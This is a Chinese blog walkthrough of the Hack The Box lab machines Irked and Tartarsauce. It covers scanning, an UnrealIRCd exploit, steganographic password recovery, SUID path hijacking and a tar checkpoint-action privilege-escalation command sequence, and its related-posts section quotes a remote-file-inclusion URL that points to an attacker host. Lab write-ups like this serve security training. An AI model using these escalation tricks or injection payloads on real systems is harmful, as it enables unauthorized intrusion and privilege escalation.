HTB-oscplike-Irked+Tartarsauce

最新推荐文章于 2024-06-12 00:09:33 发布
最新推荐文章于 2024-06-12 00:09:33 发布
阅读量1.6k 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53302733/article/details/123909189
版权

HTB-oscplike-Irked+Tartarsauce

Irked

easy难度的lrked 靶机IP 10.10.10.117

sudo nmap -sC -sV -A -p- --min-rate=5000 -Pn 10.10.10.117

22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.10 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
6697/tcp open irc UnrealIRCd
8067/tcp open irc UnrealIRCd
36252/tcp open status 1 (RPC #100024)
65534/tcp open irc UnrealIRCd

常规的dirsearch wfuzz没看到什么有用的东西 80端口就个图片 其他端口也连不上
然后之后searchsploit unrealirc 找个脚本连上去
连上去拿flag是不够权限的 但在djmardov下有个.backup 里面藏了一个密码
UPupDOWNdownLRlrBAbaSSss 但是这个密码是干勾八用的呢 我找了半天没看出来
这里我翻了半天。。。这个故事告诉我们一定不要偷懒 尽量还是用 ls-la 看文件

最后看别人的walkthrough发现这也太捏麻抽象了 80端口那个图片是有隐写的
这是图片隐写的密码 这捏麻隔这CTF呢 下载那个图片下来
steghide --extract -sf irked.jpg 得到Kab6h+m+bbp2J:HG ssh连进去
拿到user的flag 4a66a78b12dc0e661a59d3f5c0267a8e

find / -perm -u=s -type f 2>/dev/null看到有个/usr/bin/viewuser
运行一下发现它执行了/tmp/listusers但是not found 那我们给他编一个不就完了
8d8e9e8be64654b6dccc3bff4522daf3
请添加图片描述

Tartarsauce

medium难度的tartarsauce 靶机IP 10.10.10.88

sudo nmap -sC -sV -A -p- --min-rate=5000 -Pn 10.10.10.88
就一个80 dirsearch扫出一个robots.txt 找到路径10.10.10.88/webservices/monstra-3.0.4/
但是经过一系列排除 这个好像是兔子洞 爆破/webservices发现了/webservices/wp 是wordpress
http://10.10.10.88/webservices/wp/wp-login.php可以登陆后台
wpscan --url http://10.10.10.88/webservices/wp -e p --plugins-detection aggressive
看到一个插件gwolle 但是searchsploit发现漏洞的版本是不一致的
这个地方非常抽象 因为这个版本是作者瞎编的 其实是存在漏洞的版本
拿exp直接nc弹回来 但是权限很低

sudo -l 看到可以用onuma执行tar 那么就tar提权
echo “/bin/bash” > shell.sh
echo “” > “–checkpoint-action=exec=sh shell.sh”
echo “” > --checkpoint=1
sudo -u onuma tar cf archive.tar *
拿到user的flag b2d6ec45472467c836f253bd170182c7

继续提权 执行linpeas看到
╔══════════╣ System timers

NEXT LEFT LAST PASSED UNIT ACTIVATES
Fri 2022-04-01 05:31:27 EDT 4min 23s left Fri 2022-04-01 05:26:27 EDT 36s ago backuperer.timer backuperer.service

五分钟会执行一次backuperer.service
which backuperer
/usr/sbin/backuperer
分析这个文件可以看到
请添加图片描述
分析发现我们要在间隔的三十秒里用压缩包替换tmpfile 然后等check文件夹出来进去执行我们的shell
但这里有两个点要注意 一个是压缩包内需要有/var/www/html路径
另一个是这个文件需要是32位的 这里浪费了我很长时间 有点恶心
这一台提到root这块是真有点难
e79abdab8b8a4b64f8579a10b2cd09f9
请添加图片描述

ore0
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
HTB靶场系列 linux靶机 Tartarsause靶机
m0_57221101的博客
01-21 1690
勘探 nmap直接扫 root@kali:~/hackthebox/tartarsauce-10.10.10.88# nmap 10.10.10.88 Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-22 12:21 EDT Warning: 10.10.10.88 giving up on port because retransmission cap hit (10). Nmap scan report for 10.10.10.88 Host
HTB-Irked
TA不懒,但还没有添加简介
08-15 1025
HTB-Irked
No.131-HackTheBox-Linux-TartarSauce-Walkthrough渗透学习
qq_34801745的博客
06-10 711
** HackTheBox-Linux-TartarSauce-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/138 靶机难度:中级(4.7/10) 靶机发布日期:2018年10月28日 靶机描述: TartarSauce is a fairly challenging box that highlights the importance of a broad remote enumeration instead of
shaper-scripts:示例防火墙 + HTB + IMQ
05-29
信息 ifconfig eth0: flags=4163<UP> mtu 1500 inet 192.168.120.160 网络掩码 255.255.255.0 广播 192.168.120.255 inet6:80:40ffab0c0c 前缀:80:40ffab0c00c 前缀:280:4000c0c e8:fa:b3 txqueuelen 1000 ...
qos-htb-开源
05-03
qos-htb是您一直在等待的简单带宽管理解决方案,graphix制作了图表,您可以在一秒钟之内查看到底谁在消耗带宽!
xml-HTB-开源
05-02
xml-HTB是用于自动生成bash脚本的工具,该工具可在Linux上设置HTB。 它使用xml配置文件。 它易于使用,具有许多功能:多种深度的类,可配置的叶子,u32和fw过滤器,可同时配置两个输入
ROS3.30 +HTB+DSCP-L7
10-11
ROS3.30 +HTB+DSCP-L7
HTB-Solutions
03-09
HTB-Solutions
hackthebox - TartarSauce (考点:信息搜集/wp漏洞)(未完成)
冬萍子癸水
04-15 420
nmap 就一个80,里面一张酸酸乳样的照片 然后打开robots.txt,看到webservices似乎有很多料,点看看看未发现太多 同时,扫目录也发现了webservices 继续深挖,扫webservices里面还有啥。 看到wp。wordpress的简称 看到wp就要想到用wpscan扫他 wpscan --url http://10.10.10.88/webservices/wp ...
OSCP 2021攻略之旅--从小白到通过
热门推荐
ShadowBlade
08-08 2万+
发布此文章,能够让更多想学习通过OSCP的同学得到更好的指导。
Hack the box靶机 TartarSauce
菜浪马废的博客
05-21 508
5个页面 访问一下 找到点东西 一个损坏的blog 呵呵 又是一个兔子洞 nice 一天钻了两个洞 接着上面的那个损坏的页面来 扫描报错 没有api https://wpvulndb.com/api http://10.10.10.88/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.16.118:8000/ 需要打开http服务 还要创建一个wp-load.php的反射脚本.
msf利用Metasploitable 2 漏洞之6667端口之unreal_ircd_3281_backdoor
crowsec
05-05 5425
Metasploitable漏洞演练系统 是Metasploit团队维护的一个集成了各种漏洞弱点的Linux主机(ubuntu)镜像,这方便大家对于msf的学,以下以6667端口的unreal_ircd_3281_backdoor进行攻击。可以在虚拟机中启动(登录密码和账号都是msfadmin)查看其ip:    ifconfig地址为:192.168.127.145然后在kali linux中进...
Nmap 操作指南
m0_73351035的博客
10-06 990
除了端口扫描外,Nmap还具备如下功能。● 主机探测:Nmap 可査找目标网络中的在线主机。默认情况下,Nmap 通过4种方式——ICMP echo 请求(ping)、向443端口发送TCP SYN 包、向80端口发送TCP ACK包和ICMP时间戳请求——发现目标主机。● 服务/版本检测:在发现开放端口后,Nmap 可进一步检查目标主机的检测服务协议、应用程序名称、版本号等信息。● 操作系统检测:Nmap 向远程主机发送一系列数据包,并能够将远程主机的响应与操作系统指纹数据库进行比较。
渗透测试之靶机试炼(一)
simple___sunny的博客
01-10 1万+
1
HTB系列】靶机Irked的渗透测试详解
大方子
05-10 2285
介绍 Kali: 10.10.13.32 靶机地址:10.10.10.117 先用nmap扫描下靶机 靶机开放了 22 80 111 端口 查看下靶机的80端口 我们用gobuster对网站的目录也进行一次爆破 访问下/manual,得到apache的文档页面没有可以利用的点 然后我们在根据页面上的显示”IRC i...
Hack the box靶机 Irked
菜浪马废的博客
05-22 243
nmap扫描完我就觉得突破口在irc 但是没有任何信息啊 再找找
【网络安全】【深度学习】【入侵检测】SDN模拟网络入侵攻击并检测,实时检测,深度学习【二】
最新发布
q742971636的博客
06-12 773
以通过 Alt+F2 然后输入 xterm 尝试打开xterm。这之后就可以用Ctrl+Alt+T打开新终端了。在之前的代码中,已经捕获到攻击流量并打印。
cozyhosting+htb
09-20
CSDN AI助手(C知道):对于你提到的 "cozyhosting htb",我理解的是你在提及CTF平台Hack The Box中的CozyHosting机器。CozyHosting是一个涉及Web应用安全的挑战。你可能需要在Hack The Box平台上登录并进行相关操作...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值